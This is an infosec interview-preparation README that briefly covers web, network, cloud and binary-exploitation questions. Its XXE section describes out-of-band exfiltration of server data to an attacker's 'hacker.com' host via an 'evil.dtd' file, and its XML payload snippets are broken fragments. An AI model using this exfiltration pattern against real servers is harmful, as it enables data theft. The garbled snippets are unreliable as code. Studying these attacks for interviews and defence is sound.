└── README.md
/README.md:
--------------------------------------------------------------------------------
1 | # Interview Tips (Information Security)
2 | This page is a summary of interviews I have been through, covered a decent breadth of roles, got multiple rejects however, learned from each interview, collected constructive feedbacks and went ahead.
3 | Hope these questions/ tips could help you.
4 |
5 | Roles which it generally covers are as follows:
6 | - Cybersecurity Intern
7 | - Penetration Testing Intern/ Red Team
8 | - Web App/ Application Security Intern
9 | - Product Security Intern
10 | - Infrastructure Security Intern
11 |
12 | Quick tip:
13 | - Review your resume and ask questions related to it to yourself beforehand
14 | - If you are not aware of any question/concept, don't run around the topic, convey that you could learn it given an environment to work on
15 | *You cannot know everything, be humble to accept if you answered something wrong or in need for clarification*
16 | - Prepare a short bio about yourself beforehand to introduce yourself
17 | - Be sure about your end goal and why infosec?
18 | - Lastly, do ask about feedback at the end of the interview, *why, because:* it helps in knowing and filling the gaps of your current knowledge in infosec
19 |
20 | I have tried to jot down all the possible question below which I came across and provided answers for few.
21 | Rest you could google for their specific answers and if you want to dive deep. Apart from that, there are few references in the end do have a look. Those were really helpful.
22 |
23 | *Would love to add more question as I move ahead and check my notes, however would appreciate if you could give me a constructive feedback about this by contacting me via jiger13@gmail.com.
24 | If you came across something, which is not covered out here please feel free to share.*
25 |
26 | ## Common questions
27 |
28 | 1. Security Triads:
29 |
30 | What is CIA?
31 | - Confidentiality
32 | - Integrity
33 | - Availability
34 |
35 | What is AAA?
36 | - Authentication
37 | - Authorization
38 | - Accounting
39 |
40 | 2. Difference between Threat, Vulnerability, Exploits and Risk and how those are related to Assets
41 | - Threat:
42 | A threat is what we’re trying to protect against
43 | - Vulerability:
44 | A vulnerability is a weakness or gap in our protection efforts
45 | - Exploit:
46 | An ability/program (may be a software or social engineering skill) that has been developed to attack an asset by taking advantage of a vulnerability
47 | - Risk:
48 | Risk is the intersection of assets, threats, and vulnerabilities
49 | - Asset:
50 | An asset is what we’re trying to protect
51 |
52 | 3. What is IAM and why it is been used?
53 | IAM is Identity Access Management which used to segreagate roles and responsibilities within an organization. It is a critical piece in security. It help in maintaining Access level security and privileges
54 |
55 | ## Security in general
56 |
57 | ### Phases of Network Intrusion Attack:
58 | - Reconnaissance/ Information Gathering
59 | - Gaining the needed access
60 | - Maintaining the access
61 | - Covering the tracks (Deleting logs, backdoors and hiding all controls)
62 |
63 | ## Web Application Security
64 |
65 | 1. Common Question:
66 | - OWASP Top 10
67 | - What is XSS (Cross-site Scripting)
68 | - Practice XSS at: [https://xss-game.appspot.com/]
69 | - How to combat XSS: *Briefly use appropriate input validation*
70 | - Look for CSP (Content-Security-Policy) Header
71 | - Different types of XSS:
72 | *Reflected, Stored and DOM-based*
73 | - What are sources and sinks in DOM which could lead to XSS:
74 | [https://www.netsparker.com/blog/web-security/dom-based-cross-site-scripting-vulnerability/]
75 | - What is CSRF
76 | *This is the sweetest question which every other interviewer would love to ask*
77 | *Quick Tip:* Be brief, if asked then only explain the whole story
78 |
79 | Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. CSRF attacks specifically target **state-changing requests, not theft of data**, since the attacker has no way to see the response to the forged request. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application.
80 |
81 | - How to combat CSRF:
82 | Use Anti-CSRF Tokens
83 | Use same-origin policy
84 | Usage of Referrer header
85 | - What is HTML/ URL Encoding
86 | - Is HTTP protocol stateless?
87 | HTTP is inherently stateless protocol however server uses cookies to make it stateful
88 | - What are types of Injections: *SQL, Command, OS*
89 | - How to combat SQL injections
90 | Use paramterized queries and stored procedures
91 |
92 | 2. Check for headers which helps in providing security (Check the Urls and go throught the content, it would help in building your fundamentals):
93 | - CSP (Content-Security Policy) [https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy]
94 | [https://www.html5rocks.com/en/tutorials/security/content-security-policy/]
95 | - CORS (Cross-Origin Resource Sharing) [https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS]
96 | - Same-Origin policy [https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy]
97 |
98 | 3. There would be rare scenarios when an interviewer would ask these, I came across the followings in later stages of few interviews, thought of mentioning:
99 |
100 | - What is XXE (XML External Entities)?
101 | XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data. It often allows an attacker to view files on the application server filesystem, and to interact with any backend or external systems that the application itself can access.
102 | Check this out [https://portswigger.net/web-security/xxe]
103 | E.g:
104 | ```
105 |
106 | ]>
107 | &xxe;
108 | ```
109 | In some situations, an attacker can escalate an XXE attack to compromise the underlying server or other backend infrastructure, by leveraging the XXE vulnerability to perform server-side request forgery (SSRF) attacks.
110 | - Out-Of-Band - using XML entities, data from server can be grabbed and sent to hacker.com (NO server output required)
111 |
112 | To be injected: document.xml
113 | ```
114 |
116 | %remote; %intern; %xxe;
117 | ]>
118 | &xxe; - you can change xxe entity to general entity
119 | ```
120 | External host: http://hacker.com/evil.dtd
121 | ```
122 |
123 | ">
124 | --- OR ---
125 | "> - consider error-based
126 | ```
127 | Ref: [https://phonexicum.github.io/infosec/xxe.html]
128 |
129 | - What is SSRF (Server Side Request forgery) attack
130 | Could be used to pivot into the internal network
131 | - How to secure 3-tier web architecture
132 | - What is Kerberos
133 | https://www.varonis.com/blog/kerberos-authentication-explained/
134 | - What is Secret Management and Vaults
135 | https://www.hashicorp.com/resources/introduction-vault-whiteboard-armon-dadgar
136 |
137 | ## Network Security
138 | - Difference between Symmetric and Asymmetric cryptography
139 | - Difference between Public key cryptography and Asymmtric key cryptography: Both are same *Tricky Question*
140 | - Modes in Cryptography (Eg. EBC, CBC, etc)
141 | - What is Perfect Forward Secrecy
142 | [https://scotthelme.co.uk/perfect-forward-secrecy/]
143 | Simply put, PFS’s primary job is to make sure that in the event of the private key of a server being compromised, an attacker will not be able to decrypt any previous TLS communications. Perfect Forward Secrecy is possible by using the Diffie-Hellman ephemeral key exchange, which provides new keys for every session and is valid as long as the session is active.
144 | - Cipher suite insight:
145 | Ex: TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
146 | https://scotthelme.co.uk/https-cheat-sheet/
147 | - During Data Compression and Encrytion what happens first compression or encryption
148 | Compression happens first, since the entropy (spread) of randomness in data is low, thus higher compression could be achievable, thus it is advantageous to first compress then encrypt.
149 | - Difference between Encryption, Encoding, Hashing and Obfuscation
150 | https://danielmiessler.com/study/encoding-encryption-hashing-obfuscation/
151 | - What is Rainbow-table: *Briefly it is a collection of precomputed hashes*
152 | - How TLS works?
153 | *This is an amazing image I stumbled upon, it helped me to understand TLS in layman language*
154 | http://i.imgur.com/5T2fJsG.png
155 | - What is Certificate Signing
156 | - How Traceroute works
157 | - How Nmap works
158 | - What is Certification Authority (CA)
159 | - What is DMZ and what are the components involved in it
160 | - What port does ping work over?
161 | *A trick question* to be sure, but an important one.
162 | Hint: ICMP is a layer 3 protocol (it doesn’t work over a port) A good variation of this question is to ask whether ping uses TCP or UDP. An answer of either is a fail, as those are layer 4 protocols.
163 |
164 | ## Cloud Security
165 | Would talk in general in terms of AWS, however there are other cloud providers such as Azure, GCP, Digital Ocean, etc..
166 | - General components of AWS:
167 | S3, EC2, Buckets, IAM, Cloud trial, Cloud watch
168 | - What is IAM and their components: To be brief IAM is used for Access Management where it used Roles (for temporary access), Policies, Groups and Users for its functioning
169 | - What is EC2: It is an Elastic instance for spinning up a Virtual Machine
170 | - Does EC2 has encrytion: Yes, it does. Amazon EBS encryption offers a simple encryption solution for your EBS volumes without the need to build, maintain, and secure your own key management infrastructure. Amazon EBS encryption uses AWS Key Management Service (AWS KMS) customer master keys (CMKs) when creating encrypted volumes and any snapshots created from them.
171 | More could be found ... below
172 | https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSEncryption.html
173 |
174 | ## Binary Exploitation
175 |
176 | - Tools could be used for debugging a binary:
177 | Linux: gdb, radare, clutter (GUI for radare)
178 | Windows: IDA, Binary Ninja
179 | - What is Buffer Overflow
180 | - What is Format String Vulnerability
181 | - Difference between Stack and Heap region (Might consider looking into Code, Text and Bss region as well)
182 | - What are Stack Cookies
183 | - What is ASLR and why it is used?
184 | - What is non-executable memory?
185 |
186 |
187 | ## References
188 | Learning Resource:
189 | https://regexone.com/ (Regular Expressions are must!)
190 | https://portswigger.net/web-security/
191 | OWASP Top 10:
192 | https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf
193 | Infosec Interview Questions:
194 | https://danielmiessler.com/study/infosec_interview_questions
195 | Top Pentest Questions:
196 | https://resources.infosecinstitute.com/top-30-penetration-tester-pentester-interview-questions-and-answers-for-2019/#gref
197 | Python tips:
198 | https://www.codementor.io/sheena/essential-python-interview-questions-du107ozr6
199 | AWS User Guide:
200 | https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/concepts.html
201 | SMB and Samba insight:
202 | https://fitzcarraldoblog.wordpress.com/2016/10/17/a-correct-method-of-configuring-samba-for-browsing-smb-shares-in-a-home-network/
203 |
--------------------------------------------------------------------------------